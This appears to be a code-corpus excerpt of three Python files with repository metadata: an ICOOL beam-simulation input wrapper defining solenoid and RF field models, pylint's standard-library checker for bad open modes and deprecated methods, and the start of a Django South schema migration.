'pos': 4, 'type': 'Real', 'doc': ''},
'focus_flag': {
'pos': 5, 'type': 'Real', 'doc': ''}}}}
def __init__(self, **kwargs):
Field.__init__(self, 'ACCEL', kwargs)
def __call__(self, **kwargs):
Field.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'ftag':
if value == 'ACCEL':
object.__setattr__(self, name, value)
else:
raise ValueError('Illegal attempt to set incorrect ftag.')
else:
Field.__setattr__(self, name, value)
def __str__(self):
return Field.__str__(self)
def gen_fparm(self):
Field.gen_fparm(self)
def gen(self, file):
Field.gen(self, file)
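# Illustrative usage sketch (an editorial addition, not part of the original
# source): the parms dicts above define the keyword arguments each model
# accepts, with validation delegated to Field. For example, a sector-shaped
# pillbox cavity might be configured as:
#
#     rf = Accel(model='sec_pill_circ', freq=201.25, grad=15.0, phase=30.0)
#
# The doc strings above are empty, so no units are asserted here; freq, grad
# and phase are assumed to be in whatever units ICOOL expects.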
class Sol(Field):
"""
SOL solenoid field
1 model level
1: Bz with constant central region + linear ends
2: dTANH(z) Bz dependence
3: field from sum of circular current loops
4: field from annular current sheet
5: field from thick annular current block
6: interpolate field from predefined USER r-z grid
7: tapered radius
8: hard-edge with adjustable end fields
9: determine field from file of Fourier coefficients
10: determine field from file of on-axis field
For model = 1
2 field strength [T]
3 length of central region, CLEN[m] (You can use this to get a tapered field profile)
4 length of entrance end region, ELEN1 [m] This is the displacement of the
upstream end of the solenoid from the start of the region.
5 constant offset for Bz [T]
Use parameter 5 to get an indefinitely long, constant solenoidal field.
6 length of exit end region, ELEN2 [m].
For a symmetric field, set SLEN = CLEN + ELEN1 + ELEN2. Hard-edge field models
can include the focusing effects of the missing fringe field by using EDGE commands
before and after the hard-edge field region.
For model = 2
2 field strength [T]
3 length of central region, CLEN[m]
4 length for end region, ELEN [m] (This is the displacement of the
upstream end of the solenoid from the start of the region; for a symmetric field, set SLEN =
CLEN + 2*ELEN.)
5 order of vector potential expansion {1, 3, 5, 7}
6 end attenuation length, [m] (Set larger than maximum beam size)
7 constant offset for Bs [T]
For model = 3
2 field strength [T]
3 length of central region, CLEN[m] (This is the region over which the coils are
distributed)
4 length for end region, ELEN[m] (This is the displacement of the
upstream end of the solenoid from the start of the region; for a symmetric field, set SLEN =
CLEN + 2*ELEN.)
5 # of coil loops (equi-spaced over CLEN)
6 radius of coils [m]
For a symmetric field with 1 loop, set ELEN=0.5 SLEN.
For model = 4
2 field strength [T]
3 length of sheet [m]
4 z offset of center of sheet from start of region [m]
5 radius of sheet [m]
For model = 5
2 field strength [T]
3 length of block [m]
4 z offset of center of block from start of region [m]
5 inner radius of block [m]
6 outer radius of block[m]
For model = 6
2 grid # of user-supplied field {1-4}
3 interpolation level {1-3}
1: bi-linear
2: bi-quadratic polynomial
3: bi-cubic polynomial
The required format of the field map is
title (A80)
# of z grid points (I) {1-5000}
# of r grid points (I) {1-100}
i, j, z(i), r(j), BZ(i,j), BR(i,j) (I, R)
For model = 7
2 Bc [T] (flat central field strength)
3 Rc [m] (flat central coil radius)
4 Lc [m] (central field length)
5 B1 [T] (starting field strength)
6 R1 [m] (starting coil radius)
7 L1 [m] (length of entrance transition region)
8 B2 [T] (ending field strength)
9 R2 [m] (ending coil radius)
10 L2 [m] (length of exit transition region)
This model applies a geometry cut on particles whose radius exceeds the specified radial taper.
A brief usage sketch follows the class definition below.
"""
begtag = 'SOL'
endtag = ''
models = {
'model_descriptor': {
'desc': 'Name of model parameter descriptor',
'name': 'model',
'num_parms': 15,
'for001_format': {
'line_splits': [15]}},
'bz': {
'desc': 'Bz with constant central region + linear ends',
'doc': '',
'icool_model_name': 1,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'strength': {
'pos': 2, 'type': 'Real', 'doc': 'Field strength [T] '},
'clen': {
'pos': 3, 'type': 'Real', 'doc': 'Length of central region, CLEN[m] (You can use this to get a tapered field profile)'},
'elen1': {
'pos': 4, 'type': 'Real', 'doc': 'Length of entrance end region, ELEN1 [m]. This is the displacement of the '
'upstream end of the solenoid from the start of the region'},
'offset': {
'pos': 5, 'type': 'Real', 'doc': 'Constant offset for Bz [T]. Use this to get an indefinitely long, constant solenoidal field.'},
'elen2': {
'pos': 6, 'type': 'Real', 'doc': 'Length of exit end region, ELEN2 [m]. For a symmetric field, set:'
'SLEN =CLEN + ELEN1 + ELEN2. '
'Hard-edge field models can include the focusing effects of the missing fringe '
'field by using EDGE commands before and after the hard-edge field region'}}},
'dtanh': {
'desc': 'dTANH(z) Bz dependence',
'doc': '',
'icool_model_name': 2,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'strength': {
'pos': 2, 'type': 'Real', 'doc': 'Field strength [T] '},
'clen': {
'pos': 3, 'type': 'Real', 'doc': 'Length of central region, CLEN[m] (You can use this to get a tapered field '
'profile)'},
'elen': {
'pos': 4, 'type': 'Real', 'doc': 'Length for end region, ELEN [m] (This is the displacement of the upstream end '
'of the solenoid from the start of the region; for a symmetric field, '
'set SLEN =CLEN + 2*ELEN.)'},
'order': {
'pos': 5, 'type': 'Real', 'doc': 'Order of vector potential expansion {1, 3, 5, 7}'},
'att_len': {
'pos': 6, 'type': 'Real', 'doc': 'End attenuation length, [m] (Set larger than maximum beam size) '},
'offset': {
'pos': 7, 'type': 'Real', 'doc': 'Constant offset for Bs [T]'}}},
'circ': {
'desc': 'Field from sum of circular current loops',
'doc': 'For a symmetric field with 1 loop, set ELEN=0.5 SLEN.',
'icool_model_name': 3,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'strength': {
'pos': 2, 'type': 'Real', 'doc': 'Field strength [T] '},
'clen': {
'pos': 3, 'type': 'Real', 'doc': 'Length of central region, CLEN[m]. '
'(This is the region over which the coils are distributed)'},
'elen': {
'pos': 4, 'type': 'Real', 'doc': 'Length for end region, ELEN [m] (This is the displacement of the upstream end of '
'the solenoid from the start of the region; for a symmetric field, '
'set SLEN =CLEN + 2*ELEN.)'},
'loops': {
'pos': 5, 'type': 'Real', 'doc': 'Number of coil loops (equi-spaced over CLEN)'},
'radius': {
'pos': 6, 'type': 'Real', 'doc': 'Radius of coils [m]'}}},
'sheet': {
'desc': 'Field from annular current sheet',
'doc': '',
'icool_model_name': 4,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'strength': {
'pos': 2, 'type': 'Real', 'doc': 'Field strength [T] '},
'length': {
'pos': 3, 'type': 'Real', 'doc': 'Length of sheet [m] '},
'z_offset': {
'pos': 4, 'type': 'Real', 'doc': 'z offset of center of sheet from start of region [m]'},
'radius': {
'pos': 5, 'type': 'Real', 'doc': 'Radius of sheet [m]'}}},
'block': {
'desc': 'Field from thick annular current block',
'doc': '',
'icool_model_name': 5,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'strength': {
'pos': 2, 'type': 'Real', 'doc': 'Field strength [T] '},
'length': {
'pos': 3, 'type': 'Real', 'doc': 'Length of block [m] '},
'z_offset': {
'pos': 4, 'type': 'Real', 'doc': 'z offset of center of block from start of region [m]'},
'inner': {
'pos': 5, 'type': 'Real', 'doc': 'Inner radius of block [m]'},
'outer': {
'pos': 6, 'type': 'Real', 'doc': 'Outer radius of block [m]'}}},
'interp': {
'desc': 'Interpolate field from predefined USER r-z grid',
'doc': 'The required format of the field map is:\n'
'title (A80)\n'
'# of z grid points (I) {1-5000}\n'
'# of r grid points (I) {1-100}\n'
'i, j, z(i), r(j), BZ(i,j), BR(i,j) (I, R)',
'icool_model_name': 6,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'grid': {
'pos': 2, 'type': 'Real', 'doc': 'Grid # of user-supplied field {1-4}'},
'level': {
'pos': 3, 'type': 'Int', 'doc': 'Interpolation level {1-3}:\n'
'1: bi-linear\n'
'2: bi-quadratic polynomial\n'
'3: bi-cubic polynomial ', 'min': 1, 'max': 3}}},
'tapered': {
'desc': 'Tapered radius',
'doc': 'This model applies a geometry cut on particles whose radius '
'exceeds the specified radial taper.',
'icool_model_name': 7,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'bc': {
'pos': 2, 'type': 'Real', 'doc': 'Bc [T] (flat central field strength) '},
'rc': {
'pos': 3, 'type': 'Real', 'doc': 'Rc [m] (flat central coil radius) '},
'lc': {
'pos': 4, 'type': 'Real', 'doc': 'Lc [m] (central field length) '},
'b1': {
'pos': 5, 'type': 'Real', 'doc': 'B1 [T] (starting field strength)'},
'r1': {
'pos': 6, 'type': 'Real', 'doc': 'R1 [m] (starting coil radius)'},
'l1': {
'pos': 7, 'type': 'Real', 'doc': 'L1 [m] (length of entrance transition region)'},
'b2': {
'pos': 8, 'type': 'Real', 'doc': 'B2 [T] (ending field strength)'},
'r2': {
'pos': 9, 'type': 'Real', 'doc': 'R2 [m] (ending coil radius)'},
'l2': {
'pos': 10, 'type': 'Real', 'doc': 'L2 [m] (length of exit transition region)'}}},
'edge': {
'desc': 'Hard-edge with adjustable end fields',
'doc': 'The focusing deficit is B²L − ∫B² ds. The deficit is independent of the focusing effect chosen with parameter 3.',
'icool_model_name': 8,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'bs': {
'pos': 2, 'type': 'Real', 'doc': 'Bs [T] (hard-edge field strength)'},
'foc_flag': {
'pos': 3, 'type': 'Integer', 'doc': 'Flag on whether to include end focusing:\n'
'0: both entrance and exit focusing\n'
'1: exit focusing only\n'
'2: entrance focusing only\n'
'3: no edge focusing ',
'min': 0, 'max': 3},
'ent_def': {
'pos': 4, 'type': 'Real', 'doc': 'Focusing deficit at entrance [T² m]'},
'ex_def': {
'pos': 5, 'type': 'Real', 'doc': 'Focusing deficit at exit [T² m]'}}},
'fourier': {
'desc': 'Determine field from file of Fourier coefficients',
'doc': 'The contents of the input file for0JK.dat is\n'
'1 title (A80)\n'
'2.1 period, λ (R)\n'
'2.2 field strength, S (R)\n'
'3 maximum Fourier order (I)\n'
'(4 repeated for each order)\n'
'4.1 order, m (I) {0 – 199}\n'
'4.2 cm (R)\n'
'4.3 dm (R)\n'
'The on-axis field is given by:\n'
'f (s) = S Σ ( cm COS(u) + dm SIN(u) )\n'
'where u = 2πms / λ.',
'icool_model_name': 9,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'order': {
'pos': 2, 'type': 'Integer', 'doc': 'Order of off-axis expansion (I) {1, 3, 5, 7} '},
'scale': {
'pos': 3, 'type': 'Real', 'doc': '(R) Multiplies field strength '}}},
'on_axis': {
'desc': 'Determine field from file of on-axis field',
'doc': '',
'icool_model_name': 10,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'file_num': {
'pos': 2, 'type': 'Integer', 'doc': 'File number JK for input data (I). File name is for0JK.dat'},
'order': {
'pos': 3, 'type': 'Integer', 'doc': 'Order of off-axis expansion (I) {1, 3, 5, 7} '},
'scale': {
'pos': 4, 'type': 'Real', 'doc': '(R) Multiplies field strength '}}}}
def __init__(self, **kwargs):
Field.__init__(self, 'SOL', kwargs)
def __call__(self, **kwargs):
Field.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'ftag':
if value == 'SOL':
object.__setattr__(self, name, value)
else:
raise ValueError('Illegal attempt to set incorrect ftag.')
else:
Field.__setattr__(self, name, value)
def __str__(self):
return Field.__str__(self)
def gen_fparm(self):
Field.gen_fparm(self)
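# Usage sketch referenced in the docstring above (an assumption, since Field
# performs the actual keyword validation): a hard-edged 1 m solenoid at 2 T
# using the 'bz' model, with keywords taken from its parms dict:
#
#     sol = Sol(model='bz', strength=2.0, clen=1.0, elen1=0.0,
#               offset=0.0, elen2=0.0)
#     sol.gen_fparm()
#
# For a symmetric field the docstring prescribes SLEN = CLEN + ELEN1 + ELEN2.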
class Edge(Field):
"""
EDGE
1) edge type (A4) {SOL, DIP, HDIP, DIP3, QUAD, SQUA, SEX, BSOL, FACE}
2.1) model # (I) {1}
2.2-5) p1, p2, p3, p4 (R) model-dependent parameters
Edge type = SOL
p1: BS [T]
If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
Edge type = DIP
p1: BY [T]
Edge type = HDIP
p1: BX [T]
Edge type = DIP3
p1: rotation angle [deg]
p2: BY0 [T]
p3: flag 1:in 2:out
Edge type = QUAD
p1: gradient [T/m]
Edge type = SQUA
p1: gradient [T/m]
Edge type = SEX
p1: b2 [T/m²] (cf. C. Wang & L. Teng, MC 207)
Edge type = BSOL
p1: BS [T]
p2: BY [T]
p3: 0 for entrance face, 1 for exit face
Edge type = FACE
This gives vertical focusing from rotated pole faces.
p1: pole face angle [deg]
p2: radius of curvature of reference particle [m]
p3: if not 0 => correct kick by the factor 1 / (1+δ)
p4: if not 0 => apply horizontal focus with strength = (-vertical strength)
If a FACE command is used before and after a sector dipole ( DIP ), you can approximate a rectangular dipole field.
The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg’s HRDEND routine to find the change in
transverse position and transverse momentum due to the fringe field.
A brief usage sketch follows the class definition below.
"""
begtag = 'EDGE'
endtag = ''
models = {
'model_descriptor': {
'desc': 'Name of model parameter descriptor',
'name': 'model',
'num_parms': 6,
'for001_format': {
'line_splits': [
1,
5]}},
'sol': {
'desc': 'Solenoid',
'doc': '',
'icool_model_name': 'SOL',
'parms': {
'model': {
'pos': 1,
'type': 'String',
'doc': ''},
'bs': {
'pos': 3,
'type': 'Real',
'doc': 'p1: BS [T] '
'If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the '
'exit edge. (You can use this to get a tapered field profile)'}}},
}
def __init__(self, **kwargs):
Field.__init__(self, 'EDGE', kwargs)
def __call__(self, **kwargs):
Field.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'ftag':
if value == 'EDGE':
object.__setattr__(self, name, value)
else:
raise ValueError('Illegal attempt to set incorrect ftag.')
else:
Field.__setattr__(self, name, value)
def __str__(self):
return Field.__str__(self)
def gen_fparm(self):
Field.gen_fparm(self)
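# Usage sketch referenced in the docstring above (illustrative only; Field
# validates the keywords): per the SOL edge type, a 2 T solenoid would be
# bracketed by EDGE commands with opposite signs of BS:
#
#     entrance = Edge(model='sol', bs=-2.0)   # upstream face
#     exit_face = Edge(model='sol', bs=+2.0)  # downstream face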
class Output(PseudoRegion):
begtag = 'OUTPUT'
endtag = ''
num_params = 0
for001_format = {'line_splits': [0]}
command_params = {}
def __init__(self):
PseudoRegion.__init__(self, {})
class Comment(PseudoRegion):
def __init__(self, comment):
PseudoRegion.__init__(self, None)
self.comment = comment
class ICoolInput(ICoolObject):
"""This is the actual generated ICoolInput from command objects
Command objects include:
Title, Cont, Bmt, Ints, Nhs, Nsc, Nzh, Nrh, Nem, Ncv and region command objects.
Region is the superclass of all region command objects and is
subclassed into RegularRegion and PseudoRegion command objects.
RegularRegion command objects include: Section, Repeat, Cell and SRegion.
Section, Begs, Repeat and Cell will typically contain other allowed region command objects
such as SRegions as permitted by ICool.
PseudoRegion command objects include:
Aperture, Cutv, Denp, Dens, Disp, Dummy, Dvar, Edge, Grid, Output, Refp, Ref2, Reset, Rkick,
Rotate, Taper, Tilt, Transport, Background, Bfield, ! and &
title is a problem title object.
cont is a control variables object.
bmt is a beam generation variables object.
ints is a physics interactions control variables object.
nhs is a histogram definition variables object.
nsc is a scatterplot definition variables object.
nzh is a z-history definition variables object.
nrh is an r-history definition variables object.
nem is an emittance plane definition variables object.
ncv is a covariance plane definition variables object.
sec is a region definition variables object, which contains all region definitions.
A short assembly sketch follows the class definition below.
"""
command_params = {
'title': {'desc': 'Title of ICOOL simulation',
'doc': '',
'type': 'Title',
'req': True,
'default': None},
'cont': {'desc': 'ICOOL control variables',
'doc': '',
'type': 'Cont',
'req': True,
'default': None},
'bmt': {'desc': 'ICOOL beam generation variables',
'doc': '',
'type': 'Bmt',
'req': True,
'default': None},
'ints': {'desc': 'ICOOL interaction control variables',
'doc': '',
'type': 'Ints',
'req': True,
'default': None},
'nhs': {'desc': 'ICOOL histogram definition variables',
'doc': '',
'type': 'Nhs',
'req': False,
'default': Nhs()},
'nsc': {'desc': 'ICOOL scatterplot definition variables',
'doc': '',
'type': 'Nsc',
'req': False,
'default': Nsc()},
'nzh': {'desc': 'ICOOL z history definition variables',
'doc': '',
'type': 'Nzh',
'req': False,
'default': Nzh()},
'nrh': {'desc': 'ICOOL r history definition variables',
'doc': '',
'type': 'Nrh',
'req': False,
'default': Nrh()},
'nem': {'desc': 'ICOOL emittance plane definition variables',
'doc': '',
'type': 'Nem',
'req': False,
'default': Nem()},
'ncv': {'desc': 'ICOOL covariance plane definition variables',
'doc': '',
'type': 'Ncv',
'req': False,
'default': Ncv()},
'section': {'desc': 'ICOOL cooling section region definition ',
'doc': '',
'type': 'Section',
'req': True,
'default': None}}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
ICoolObject.setdefault(self, kwargs)
def __call__(self, kwargs):
ICoolObject.__call__(self, kwargs)
def __str__(self):
return ICoolObject.__str__(self, 'CONT')
def add_title(self, title):
self.title = title
def add_cont(self, cont):
self.cont = cont
def add_sec(self, sec):
self.sec = sec
def gen(self, file):
if self.title is not None:
self.title.gen_for001(file)
if self.cont is not None:
self.cont.gen_for001(file)
if self.bmt is not None:
self.bmt.gen_for001(file)
if self.ints is not None:
self.ints.gen_for001(file)
if self.nhs is not None:
self.nhs.gen_for001(file)
if self.nsc is not None:
self.nsc.gen_for001(file)
if self.nzh is not None:
self.nzh.gen_for001(file)
if self.nrh is not None:
self.nrh.gen_for001(file)
if self.nem is not None:
self.nem.gen_for001(file)
if self.ncv is not None:
self.ncv.gen_for001(file)
if self.section is not None:
self.section.gen_for001(file)
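# Sketch of assembling a complete input, as noted in the class docstring
# (assumes Title, Cont, Bmt, Ints and Section instances are constructed
# elsewhere in this module; not a tested call):
#
#     inp = ICoolInput(title=t, cont=c, bmt=b, ints=i, section=s)
#     f = open('for001.dat', 'w')
#     inp.gen(f)
#     f.close()
#
# The optional nhs/nsc/nzh/nrh/nem/ncv blocks fall back to the defaults
# declared in command_params when omitted.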
|
jon2718/ipycool_2.0
|
ipycool_orig.py
|
Python
|
mit
| 161,517
|
[
"Gaussian"
] |
53cc6087e27d0e2adbbc6f81c38c3c7e4ae7ecf9326af3c61cee0497b9662c5e
|
# -*- coding: utf-8 -*-
# Copyright (c) 2013-2014 Google, Inc.
# Copyright (c) 2013-2014 LOGILAB S.A. (Paris, FRANCE) <contact@logilab.fr>
# Copyright (c) 2014-2016 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2014 Vlad Temian <vladtemian@gmail.com>
# Copyright (c) 2014 Cosmin Poieana <cmin@ropython.org>
# Copyright (c) 2014 Arun Persaud <arun@nubati.net>
# Copyright (c) 2015 Cezar <celnazli@bitdefender.com>
# Copyright (c) 2015 Ionel Cristian Maries <contact@ionelmc.ro>
# Copyright (c) 2015 Chris Rebert <code@rebertia.com>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/COPYING
"""Checkers for various standard library functions."""
import sys
import six
import astroid
from astroid.bases import Instance
from pylint.interfaces import IAstroidChecker
from pylint.checkers import BaseChecker
from pylint.checkers import utils
OPEN_FILES = {'open', 'file'}
UNITTEST_CASE = 'unittest.case'
if sys.version_info >= (3, 0):
OPEN_MODULE = '_io'
else:
OPEN_MODULE = '__builtin__'
def _check_mode_str(mode):
# check type
if not isinstance(mode, six.string_types):
return False
# check syntax
modes = set(mode)
_mode = "rwatb+U"
creating = False
if six.PY3:
_mode += "x"
creating = "x" in modes
if modes - set(_mode) or len(mode) > len(modes):
return False
# check logic
reading = "r" in modes
writing = "w" in modes
appending = "a" in modes
text = "t" in modes
binary = "b" in modes
if "U" in modes:
if writing or appending or creating and six.PY3:
return False
reading = True
if not six.PY3:
binary = True
if text and binary:
return False
total = reading + writing + appending + (creating if six.PY3 else 0)
if total > 1:
return False
if not (reading or writing or appending or creating and six.PY3):
return False
# other 2.x constraints
if not six.PY3:
if "U" in mode:
mode = mode.replace("U", "")
if "r" not in mode:
mode = "r" + mode
return mode[0] in ("r", "w", "a", "U")
return True
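# Worked examples for _check_mode_str (derived from the logic above, not
# from pylint's test suite):
#
#     _check_mode_str('rb')    # True: read + binary
#     _check_mode_str('w+b')   # True: write + update + binary
#     _check_mode_str('rw')    # False: more than one of r/w/a
#     _check_mode_str('Uw')    # False: U cannot be combined with writing
#     _check_mode_str('tb')    # False: text and binary are exclusive
#
# On Python 2 the final block additionally normalizes 'U' modes and requires
# the effective mode to start with r, w, a or U.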
class StdlibChecker(BaseChecker):
__implements__ = (IAstroidChecker,)
name = 'stdlib'
msgs = {
'W1501': ('"%s" is not a valid mode for open.',
'bad-open-mode',
'Python supports: r, w, a[, x] modes with b, +, '
'and U (only with r) options. '
'See http://docs.python.org/2/library/functions.html#open'),
'W1502': ('Using datetime.time in a boolean context.',
'boolean-datetime',
'Using datetime.time in a boolean context can hide '
'subtle bugs when the time they represent matches '
'midnight UTC. This behaviour was fixed in Python 3.5. '
'See http://bugs.python.org/issue13936 for reference.',
{'maxversion': (3, 5)}),
'W1503': ('Redundant use of %s with constant '
'value %r',
'redundant-unittest-assert',
'The first argument of assertTrue and assertFalse is '
'a condition. If a constant is passed as parameter, that '
'condition will be always true. In this case a warning '
'should be emitted.'),
'W1505': ('Using deprecated method %s()',
'deprecated-method',
'The method is marked as deprecated and will be removed in '
'a future version of Python. Consider looking for an '
'alternative in the documentation.'),
}
deprecated = {
0: [
'cgi.parse_qs', 'cgi.parse_qsl',
'ctypes.c_buffer',
'distutils.command.register.register.check_metadata',
'distutils.command.sdist.sdist.check_metadata',
'tkinter.Misc.tk_menuBar',
'tkinter.Menu.tk_bindForTraversal',
],
2: {
(2, 6, 0): [
'commands.getstatus',
'os.popen2',
'os.popen3',
'os.popen4',
'macostools.touched',
],
(2, 7, 0): [
'unittest.case.TestCase.assertEquals',
'unittest.case.TestCase.assertNotEquals',
'unittest.case.TestCase.assertAlmostEquals',
'unittest.case.TestCase.assertNotAlmostEquals',
'unittest.case.TestCase.assert_',
'xml.etree.ElementTree.Element.getchildren',
'xml.etree.ElementTree.Element.getiterator',
'xml.etree.ElementTree.XMLParser.getiterator',
'xml.etree.ElementTree.XMLParser.doctype',
],
},
3: {
(3, 0, 0): [
'inspect.getargspec',
'unittest.case.TestCase._deprecate.deprecated_func',
],
(3, 1, 0): [
'base64.encodestring', 'base64.decodestring',
'ntpath.splitunc',
],
(3, 2, 0): [
'cgi.escape',
'configparser.RawConfigParser.readfp',
'xml.etree.ElementTree.Element.getchildren',
'xml.etree.ElementTree.Element.getiterator',
'xml.etree.ElementTree.XMLParser.getiterator',
'xml.etree.ElementTree.XMLParser.doctype',
],
(3, 3, 0): [
'inspect.getmoduleinfo',
'logging.warn', 'logging.Logger.warn',
'logging.LoggerAdapter.warn',
'nntplib._NNTPBase.xpath',
'platform.popen',
],
(3, 4, 0): [
'importlib.find_loader',
'plistlib.readPlist', 'plistlib.writePlist',
'plistlib.readPlistFromBytes',
'plistlib.writePlistToBytes',
],
(3, 4, 4): [
'asyncio.tasks.async',
],
(3, 5, 0): [
'fractions.gcd',
'inspect.getfullargspec', 'inspect.getargvalues',
'inspect.formatargspec', 'inspect.formatargvalues',
'inspect.getcallargs',
'platform.linux_distribution', 'platform.dist',
],
},
}
@utils.check_messages('bad-open-mode', 'redundant-unittest-assert',
'deprecated-method')
def visit_call(self, node):
"""Visit a CallFunc node."""
try:
for inferred in node.func.infer():
if inferred.root().name == OPEN_MODULE:
if getattr(node.func, 'name', None) in OPEN_FILES:
self._check_open_mode(node)
if inferred.root().name == UNITTEST_CASE:
self._check_redundant_assert(node, inferred)
self._check_deprecated_method(node, inferred)
except astroid.InferenceError:
return
@utils.check_messages('boolean-datetime')
def visit_unaryop(self, node):
if node.op == 'not':
self._check_datetime(node.operand)
@utils.check_messages('boolean-datetime')
def visit_if(self, node):
self._check_datetime(node.test)
@utils.check_messages('boolean-datetime')
def visit_ifexp(self, node):
self._check_datetime(node.test)
@utils.check_messages('boolean-datetime')
def visit_boolop(self, node):
for value in node.values:
self._check_datetime(value)
def _check_deprecated_method(self, node, inferred):
py_vers = sys.version_info[0]
if isinstance(node.func, astroid.Attribute):
func_name = node.func.attrname
elif isinstance(node.func, astroid.Name):
func_name = node.func.name
else:
# Not interested in other nodes.
return
# Reject nodes which aren't of interest to us.
acceptable_nodes = (astroid.BoundMethod,
astroid.UnboundMethod,
astroid.FunctionDef)
if not isinstance(inferred, acceptable_nodes):
return
qname = inferred.qname()
if qname in self.deprecated[0]:
self.add_message('deprecated-method', node=node,
args=(func_name, ))
else:
for since_vers, func_list in self.deprecated[py_vers].items():
if since_vers <= sys.version_info and qname in func_list:
self.add_message('deprecated-method', node=node,
args=(func_name, ))
break
def _check_redundant_assert(self, node, infer):
if (isinstance(infer, astroid.BoundMethod) and
node.args and isinstance(node.args[0], astroid.Const) and
infer.name in ['assertTrue', 'assertFalse']):
self.add_message('redundant-unittest-assert',
args=(infer.name, node.args[0].value, ),
node=node)
def _check_datetime(self, node):
""" Check that a datetime was infered.
If so, emit boolean-datetime warning.
"""
try:
infered = next(node.infer())
except astroid.InferenceError:
return
if (isinstance(infered, Instance) and
infered.qname() == 'datetime.time'):
self.add_message('boolean-datetime', node=node)
def _check_open_mode(self, node):
"""Check that the mode argument of an open or file call is valid."""
try:
mode_arg = utils.get_argument_from_call(node, position=1,
keyword='mode')
except utils.NoSuchArgumentError:
return
if mode_arg:
mode_arg = utils.safe_infer(mode_arg)
if (isinstance(mode_arg, astroid.Const)
and not _check_mode_str(mode_arg.value)):
self.add_message('bad-open-mode', node=node,
args=mode_arg.value)
def register(linter):
"""required method to auto register this checker """
linter.register_checker(StdlibChecker(linter))
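# For reference, a few lines this checker would flag (hypothetical snippet,
# not part of the pylint sources):
#
#     open('data.txt', 'rwx')    # W1501 bad-open-mode
#     self.assertTrue(True)      # W1503 redundant-unittest-assert (in a TestCase)
#     inspect.getargspec(func)   # W1505 deprecated-method on Python 3
#
# Each message is emitted from visit_call() once astroid resolves the call
# target to the open builtin, a unittest.case method, or a name in the
# deprecated table above.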
|
axbaretto/beam
|
sdks/python/.tox/lint/lib/python2.7/site-packages/pylint/checkers/stdlib.py
|
Python
|
apache-2.0
| 10,428
|
[
"VisIt"
] |
b57c351640fc2c1f89813536cd2a1fe92354dd3752f47958283f962f93e4b3e0
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'EphysConceptMap.added_by'
db.add_column('neuroelectro_ephysconceptmap', 'added_by',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['neuroelectro.User'], null=True),
keep_default=False)
# Adding field 'NeuronEphysDataMap.added_by'
db.add_column('neuroelectro_neuronephysdatamap', 'added_by',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['neuroelectro.User'], null=True),
keep_default=False)
# Adding field 'NeuronConceptMap.added_by'
db.add_column('neuroelectro_neuronconceptmap', 'added_by',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['neuroelectro.User'], null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'EphysConceptMap.added_by'
db.delete_column('neuroelectro_ephysconceptmap', 'added_by_id')
# Deleting field 'NeuronEphysDataMap.added_by'
db.delete_column('neuroelectro_neuronephysdatamap', 'added_by_id')
# Deleting field 'NeuronConceptMap.added_by'
db.delete_column('neuroelectro_neuronconceptmap', 'added_by_id')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
